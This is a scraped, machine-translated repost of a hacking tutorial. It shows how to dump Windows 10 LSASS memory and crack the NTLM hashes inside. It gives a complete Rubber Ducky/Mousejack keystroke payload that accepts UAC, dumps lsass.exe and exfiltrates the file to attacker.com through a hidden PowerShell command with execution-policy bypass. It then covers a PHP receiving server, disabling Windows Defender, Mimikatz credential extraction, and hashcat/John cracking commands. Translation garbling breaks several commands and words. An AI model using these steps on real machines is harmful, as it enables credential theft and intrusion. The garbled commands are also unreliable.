قالب وردپرس درنا توس
Home / Tips and Tricks / How NTLM Hashes & Crack dump Windows passwords «Null Byte :: WonderHowTo

How NTLM Hashes & Crack dump Windows passwords «Null Byte :: WonderHowTo



Windows 10 passwords stored as NTLM hashes (or, more specifically, NT hashes) can be dumped within a few seconds and filtered to an attacker's system. The hashes can easily be brutally forced and cracked to reveal the passwords in plain text using a combination of tools, including Mimikatz, ProcDump, John the Ripper and Hashcat.

Let us first discuss the Local Security Authority Subsystem Service, or LSASS, an essential part of the Windows operating system.

LSASS is responsible for authoritative domain authentication, Active Directory management and security policy enforcement. It generates the processes that are responsible for authenticating users with NTML and verifies the validity of logins. Because it is so crucial to the functionality of the operating system, hackers will often rename malicious executables after the process.

Mimikatz & ProcDump

Mimikatz, made by gentilkiwi, can be used to extract password hashes, Kerberos tickets and pin codes from the Windows 1

0 memory. its ability to extract sensitive credentials from an active Windows computer.

Today, Windows Defender and antivirus software have become increasingly effective at detecting Mimikatz versions and signatures (shown below).

VirusTotal detection rates for the latest Mimikatz version.

In combination with Mimikatz, hackers now use ProcDump, a standalone executable file designed for administrators to monitor application crashes.

ProcDump is used to extract the LSASS dump, which is later moved to an offline Windows 10 computer and is analyzed with Mimikatz. This is still an effective technique for extracting credentials from Windows 10 because ProcDump is a signed Microsoft binary file and is not flagged by most antivirus software (shown below).

Windows 10 Task Manager can also be used to dump LSASS memory without the help of Mimikatz or ProcDump. Below is an example of a Mousejack payload designed to extract and filter out the LSASS dump with only keystroke injections and PowerShell. The attack is complete within ten seconds (it is delayed at certain points for interpretation).

The Task Manager is opened in the Run with administrative rights window. The screen goes completely dark for a second due to the User Access Control (UAC) prompt, preventing the GIF maker from recording the screen. Next, the local security instance process (lsass.exe) is in the process list and is dumped to the% TEMP% folder (default). A PowerShell liner is then fully executed from the run window. It compresses the LSASS dump into a ZIP file and sends it to the attacker's server.

At this time, the attacker can use Mimikatz in an offline Windows 10 computer or virtual machine (on which no antivirus software is installed) to extract hashed passwords.

Step 1: Make the Keystroke Injection Payload

The keystroke injection payload below can be invoked with Mousejack vulnerabilities or a USB Rubber Ducky.

While MouseJack vulnerabilities were disclosed a few years ago, tens of millions of keyboards and mice (including Logitech devices) are still suspected of keystroke injection . As Marcus Mengs, creator of P4wnP1 illustrates in his proof of concept video, Logitech dongles are still vulnerable to remote attacks .

Comments ( REM ) added to each line in the payload for clarification.

  REM 2.5 seconds delay to give Windows 10 some time to correct
REM mount the USB Rubber Ducky. This initial delay is not
REM required for Mousejack attacks.
DELAY 2500

REM Open the run command window.
GUI r

REM Let the run command window open for 1 second.
DELAY 1000

REM Type "taskmgr" (i.e. Task Manager) in the execution window.
STRING taskmgr

REM delay for 0.5 seconds.
DELAY 500

REM Ctrl + Shift + Enter keyboard combination is pressed to recall
REM the User Account Control (UAC) window. This will cause
REM taskmgr to open with administrator rights.
CTRL + SHIFT ENTER

REM Display the UAC window. This may take a few seconds
REM on some Windows 10 machines.
DELAY 2500

REM ALT + y keyboard combination to accept and bypass the UAC
REM prompt.
ALT y

REM Wait a few seconds until Task Manager is fully opened with
REM administrator rights. This took (on average) 5.5 seconds in my
REM tests. In some scenarios & # 39; s, with high-end CPU & # 39; s, this delay
REM can be considerably lower.
DELAY 5500

REM Press the keyboard to move from the toolbar to the
REM list of active background processes.
DOWN

REM Type "local" to jump down and highlight the "Local Protection"
REM Authority Service "processes.
STRING locally

REM SHIFT + F10 keyboard combination invokes the right-click options
REM menu.
SHIFT F10

REM Allow 1.2 seconds to fully open the options menu.
DELAY 1200

REM Press the keyboard four times to highlight "Create"
REM dump file "option.
DOWN
DOWN
DOWN
DOWN

REM Press Enter to select the "Create Dump File" option.
ENTER

REM Wait 3.5 seconds to create and save the dump file
REM to the% TEMP% folder.
DELAY 3500

REM Press Enter to select "OK" and close the dump pop-up window.
ENTER

REM ALT + F4 combination to close the Task Manager window.
ALT F4

REM Wait 7 seconds to close Task Manager.
DELAY 700

REM Reopen the run command window.
GUI r

REM Wait .7 seconds to open the run window.
DELAY 700

REM PowerShell single liner to compress and exfiltrate the LSASS
REM dump file. Each part of the lining is explained in more detail
REM detail below.
STRING powershell -ep bypass / w 1 / C $ t = $ env: temp; $ 1 = & # 39; lsass.DMP & # 39 ;; compress-archive-path $ t  $ l-destination path $ t  a.zip; iwr attacker.com /i.php method POST file $ t  a.zip

REM Press Enter to execute the PowerShell liner.
ENTER 

The PowerShell payload consists of various commands that are linked to each other by semicolons & # 39; s:

  • powershell -ep bypass / w 1 / C – The ExecutionPolicy (-ep) is set to " bypass "to enable PowerShell execution via Windows Defender and some antivirus software. The WindowStyle (/ w) is set to "1", which immediately hides the PowerShell pop-up terminal.
  • $ t = $ env: temp; – The temporary folder of the target is set to the variable $ t. The variable use of one letter helps to shorten the total length of the load; It is more effective than typing "C: Users % USERNAME% AppData Local Temp" over and over.
  • $ 1 = & # 39; lsass.DMP & # 39 ;; – The file name lsass.DMP is set to the variable $ l. This file name is automatically defined by the Task Manager.
  • compress-archive -path $ t $ 1 -destinationpath $ t a.zip; – PowerShell & # 39; s Compress-Archive cmdlet is used to zip the lsass.DMP in the "a.zip" (-destinationpath) file.
  • iwr attacker.com/i.php -method POST -infile $ t a.zip – Invoke Webrequest (iwr) sends the a.zip (-infile) to the attacker's server in the form of a POST request. Be sure to change "attacker.com" to the local IP address of Kali or the virtual private server address.

Step 2: Intercept the LSASS Dump

Before you perform a keystroke injection, a PHP server is required to intercept the exfiltration of the dump.

The keystroke payload expects a server on port 80. For simplicity, this example uses Kali Linux on a local network, so root rights are already in use. However, setting up on a virtual private server requires root to open a listening service on port 80.

Non-Kali users can start with the following command:

  ~ $ sudo su 

Then create a folder named "phpServer /" using the command below mkdir .

  ~ $ mkdir phpServer / 

Go to the phpServer / folder with the command cd .

  ~ $ cd phpServer / 

Create a file named "i.php" with nano .

  ~ $ nano i.php 

Paste the PHP script below into the nano terminal. When that is done, press Ctrl + x then y and then and then . Enter .

to store and leave the nanoterminal.

   

This simple PHP script can intercept ZIP files and does not need to be modified in any way to function. When the Windows 10 target computer sends a .zip, this PHP server stores the data with the time as the file name.

Start the PHP server with the command php -S 0.0.0.0:80 cialis19459026]. The -S tells PHP to start a web server, while 0.0.0.0 says it should host the server on every IPv4 interface.

  ~ $ php -S 0.0.0.0: 80

PHP 7.3.0-2 Development Server started
Listen at http://0.0.0.0:80
Document root is / root / phpServer
Press Ctrl-C to stop. 

Step 3: Unpack the hash with Mimikatz

After the ZIP is intercepted, move it to a Windows 10 computer or virtual machine. Extract it to find the lsass.DMP file.

Be sure to disable Windows Defender and other security features before you download Mimikatz. Open the Start menu and search for "virus".

Click on "Virus and threat protection settings" and disable all available options. Alternatively, a virtual machine without Windows Defender or Smartscreen can be installed for Mimikatz antics.

At the time of this writing, the latest version of Mimikatz 2.2.0, Carlos -update. Open a web browser and navigate to the GitHub repository to find the latest "mimikatz_trunk.zip" version.

After unpacking the Mimikatz ZIP, open a PowerShell terminal. Use the following command to run mimikatz.exe and the mimikatz prompt appears.

  C: > PS & "C:  Users  $ env: username  PATH  TO  MIMIKATZ  x64  mimikatz.exe"

. #####. mimikatz 2.2.0 (x64) # 18362 August 13, 2019 1:35:04
. ## ^ ##. "A La Vie, A L & # 39; Amour" - (oe.eo)
## /  ## / *** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
##  / ##> http://blog.gentilkiwi.com/mimikatz
& # 39; ## v ## & # 39; Vincent LE TOUX (vincent.letoux@gmail.com)
& # 39; ##### & # 39;> http://pingcastle.com / http://mysmartlogon.com *** /

mimikatz # 

The following sekurlsa :: minidump command loads the lsass.DMP into Mimikatz.

  mimikatz # sekurlsa :: minidump C:  Users % USERNAME%  Documents  lsass.DMP

Switch to MINIDUMP: & # 39; C:  Users  tokyoneon  Documents  lsass.DMP & # 39; 

Then use the command sekurlsa :: logonPasswords to extract hash references. Since Windows 8, passwords without formatting are no longer stored in memory without further changing the operating system. But that doesn't mean that Windows 10 hashes can be brutally forced and easily cracked. In line 12 we find the hash password in NTLM format.

  mimikatz # sekurlsa :: logonPasswords

Opening: file & # 39; C:  Users  tokyoneon  Documents  lsass.DMP & # 39; for mini dump ...

1 Verification ID: 0; 102597 (00000000: 000190c5)
2 session: interactive from 1
3 Username: tokyoneon
4 Domain: MSEDGEWIN10
5 Login server: MSEDGEWIN10
6 Registration time: 5/31/2019 1:01:05 AM
7 SID: S-1-5-21-3859058339-3768143778-240673529-1000
8 msv:
9 [00000003] Primary
10 * Username: tokyoneon
11 * Domain: MSEDGEWIN10
12 * NTLM: 7b5e40a5b7b17972ad793b9fc868a66e
13 * SHA1: 6076b8f4d982b55097f910b3fb5a81c801954406
14 teaspoon:
15 most digital:
16 * Username: tokyoneon
17 * Domain: MSEDGEWIN10
18 * Password: (null)
19 kerberos:
20 * Username: tokyoneon
21 * Domain: MSEDGEWIN10
22 * Password: (null)
23 ssp:
24 credman:

Verification ID: 0; 102306 (00000000: 00018fa2)
26 session: interactive from 1
27 Username: tokyoneon
28 Domain: MSEDGEWIN10
29 Logon server: MSEDGEWIN10
30 Registration time: 5/31/2019 1:01:05 AM
31 SID: S-1-5-21-3859058339-3768143778-240673529-1000
32 msv:
33 [00000003] Primary
34 * Username: tokyoneon
35 * Domain: MSEDGEWIN10
36 * NTLM: 7b5e40a5b7b17972ad793b9fc868a66e
37 * SHA1: 6076b8f4d982b55097f910b3fb5a81c801954406
38 tspkg:
39 wdigest:
40 * Username: tokyoneon
41 * Domain: MSEDGEWIN10
42 * Password: (null)
43 kerberos:
44 * Username: tokyoneon
45 * Domain: MSEDGEWIN10
46 * Password: (null)
47 ssp:
48 credman:

49 Verification ID: 0; 74052 (00000000: 00012144)
50 session: service from 0
51 Username: sshd_server
52 Domain: MSEDGEWIN10
53 Login server: MSEDGEWIN10
54 Application time: 5/31/2019 1:01:04 AM
55 SID: S-1-5-21-3859058339-3768143778-240673529-1003
56 msv:
57 [00000003] Primary
58 * Username: sshd_server
59 * Domain: MSEDGEWIN10
60 * NTLM: 8d0a16cfc061c3359db455d00ec27035
61 * SHA1: 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
62 tspkg:
63 widest:
64 * Username: sshd_server
65 * Domain: MSEDGEWIN10
66 * Password: (null)
67 kerberos:
68 * Username: sshd_server
69 * Domain: MSEDGEWIN10
70 * Password: (null)
71 ssp:
72 credman:

mimikatz # 

Step 4: Brute-Forcing the NTLM Hash

Research suggests that most passwords are between six and eight characters, usually consisting of six letters and ending with two digits.

As a small experiment, I wanted to know how long it would take for a Raspberry Pi 3B +, common Intel i7 CPU, and GeForce GTX GPU to crack the same hash consisting of six random characters and ending with two random numbers (e.g., Nchfyr56 ).

1. Brute-Force with Raspberry Pi 3B + (John the Ripper)

After installing John the Ripper on a Raspberry Pi 3B +, the password (nchfyr56) was guessed in just over five hours. Since most passwords are eight characters long, mask attacks with a Raspberry Pi are surprisingly practical for brute-forcing NTLM hashes.

Available on Amazon: CanaKit Raspberry Pi 3B + with power supply

  ~ $ john -mask =? l? l? l? l? l? l? d? d --format = NT / root / Desktop / hash

Use standard input coding: UTF-8
1 password hash (NT [MD4 32/32]) loaded
Warning: no OpenMP support for this hash type, consider --fork = 4
Press & # 39; q & # 39; or Ctrl-C to abort, on almost any other key for the status

nchfyr56 (?)

1g 0: 05: 19: 24 DONE (2018-06-22 16:36) 0.000052g / s 1389Kp / s 1389Kc / s 1389KC / s achfyr56..zuhfyr56
Use the "--show --format = NT" options to reliably display all cracked passwords
Session completed 

2. Brute-Force with Intel i7 CPU (Hashcat CPU)

The same NTLM hash only took three minutes to crack with an old Intel i7, but it took an estimated fifteen minutes to complete the full keyspace.

  ~ $ hashcat / tmp / hash -m 1000 -a3? l? l? l? l? l? l? d? d

hashcat (v5.1.0) from ...

OpenCL Platform # 1: The pocl project
===========================================
* Device # 1: pthread-Intel (R) Core (TM) i7-3537U CPU @ 2.00GHz, assignable 2048/5809 MB, 4MCU

7b5e40a5b7b17972ad793b9fc868a66e: nchfyr56

Session ..........: hashcat
Status ...........: cracked
Hash.Type ........: NTLM
Hash.Target ......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started .....: Fri 31 Aug 21:48:25 2019 (2 minutes, 50 sec)
Time: estimated ...: Fri, 31 Aug 21:51:15 2019 (0 sec)
Guess.Mask .......:? L? L? L? L? L? L? D? D [8]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 35719.8 kH / s (7.23ms) @ Accel: 512 Loops: 128 Thr: 1 Vec: 8
Recovered ........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress .........: 6049366016/30891577600 (19.58%)
Declined .........: 0/6049366016 (0.00%)
Restore.Point ....: 344064/1757600 (19.58%)
Restore Sub # 1 ...: Salt: 0 Amplifier: 896-1024 Iteration: 0-128
Candidates. # 1 ....: hstrxp56 -> tjoqxn56

Started: Fri 31 August 21:48:09 2019
Stopped: Fri 31 August 21:51:16 2019 

3. Brute-Force with GeForce GTX GPU (Hashcat GPU)

The NTLM hash was cracked within a second. This was achieved with a fairly low end GeForce GTX 1060 GPU.

  ~ $ hashcat / tmp / hash -m 1000 -a3? L? L? L? L? L? D? D

OpenCL Platform # 1: NVIDIA Corporation
=============================================
* Device # 1: GeForce GTX 1060 3 GB, 754/3018 MB assignable, 9MCU

7b5e40a5b7b17972ad793b9fc868a66e: nchfyr56

Session ..........: hashcat
Status ...........: cracked
Hash.Type ........: NTLM
Hash.Target ......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started .....: Fri 31 Aug 03:00:38 2019 (0 sec)
Time. Estimated ...: Fri August 31 3:00:38 2019 (0 sec)
Guess.Mask .......:? L? L? L? L? L? L? D? D [8]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 4658.0 MH / s (7.06ms) @ Accel: 128 Loops: 32 Thr: 1024 Vec: 1
Recovered ........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress .........: 1094713344/30891577600 (3.54%)
Declined .........: 0/1094713344 (0.00%)
Restore.Point ....: 0/1757600 (0.00%)
Restore. # 1 ...: Salt: 0 Amplifier: 896-928 Iteration: 0-32
Candidates. # 1 ....: hstera12 -> eusind80
Hardware.Mon. # 1 ..: Temp: 34c Fan: 25% Util: 92% Core: 1898MHz Mem: 3802MHz Bus: 16

Started: Fri 31 August 03:00:34 2019
Stopped: Fri August 31 03:00:39 2019 

When testing stronger eight-character and two-digit passwords (for example Psjhfhdd48) against the GPU, the hash was cracked within twenty-five minutes.

  ~ $ hashcat / tmp / hash2 -w4 -O -m 1000 -a3? you? l? l? l? l? l? l? l? d? d

OpenCL Platform # 1: NVIDIA Corporation
=============================================
* Device # 1: GeForce GTX 1060 3 GB, 754/3018 MB assignable, 9MCU

30346ad7463810ea4d5a58090611e368: Psjhfhdd48

Session ..........: hashcat
Status ...........: cracked
Hash.Type ........: NTLM
Hash.Target ......: 30346ad7463810ea4d5a58090611e368
Time.Started .....: Fri 31 Aug 03:19:11 2019 (23 minutes, 28 sec)
Time: estimated ...: Fri 31 Aug 03:42:39 2019 (0 sec)
Guess.Mask .......:? YOU? L? L? L? L? L? L? L? D? D [10]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 12459.0 MH / s (97.89ms) @ Accel: 256 Loops: 676 Thr: 1024 Vec: 1
Recovered ........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress .........: 17567648317440/20882706457600 (84.13%)
Declined .........: 0/17567648317440 (0.00%)
Restore.Point ....: 25985286144/30891577600 (84.12%)
Restore Sub # 1 ...: Salt: 0 Amplifier: 0-676 Iteration: 0-676
Candidates. # 1 ....: Mackuobd48 -> Xzkmatgd48
Hardware.Mon. # 1 ..: Temp: 73c Fan: 50% Util: 100% Core: 1835MHz Mem: 3802MHz Bus: 16

Started: Fri 31 August 03:19:09 2019
Stopped: Fri August 31 03:42:40 2019 

Even greater integrity (eight characters + four digits) NTLM hashes needed an estimated two days to crack.

  ~ $ hashcat / tmp / hash3 -w4 - O -m 1000 -a3? YOU? L? L? L? L? L? L? L? D? D? D? D

Session ..........: hashcat
Status ...........: Active
Hash.Type ........: NTLM
Hash.Target ......: aa110854b242ed77c07be54e62611464
Time.Started .....: Fri 31 Aug 03:43:40 2019 (45 sec)
Time. Estimated ...: Sun 2 September 01:48:09 2019 (1 day, 22 hours)
Guess.Mask .......:? YOU? L? L? L? L? L? L? L? D? D? D? D [12]
Guess.Queue ......: 1/1 (100.00%)
Speed ​​# 1 .........: 12589.8 MH / s (96.68ms) @ Accel: 256 Loops: 676 Thr: 1024 Vec: 1
Recovered ........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress .........: 559804317696/2088270645760000 (0.03%)
Declined .........: 0/559804317696 (0.00%)
Restore.Point ....: 828112896/3089157760000 (0.03%)
Restore Sub # 1 ...: Salt: 0 Amplifier: 0-676 Iteration: 0-676
Candidates. # 1 ....: Maecdesr2000 -> Xzoejixr2000
Hardware.Mon. # 1 ..: Temp: 65c Fan: 38% Util: 100% Core: 1847MHz Mem: 3802MHz Bus: 16

[s] tatus [p] ause [b] ypass [c] heckpoint [q] from => 

For hackers with special brute-force machines, two days is very realistic. With a cluster of superior GPUs, an attacker can easily crack any hash that is derived from a wider keyspace.

Follow me until next time on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or send me a message if you have any questions.

Don't miss it: Getting started hacking Windows 10

Cover photo by Alex Kotliarskyi / Unsplash; Screenshots from tokyoneon / Null Byte




Source link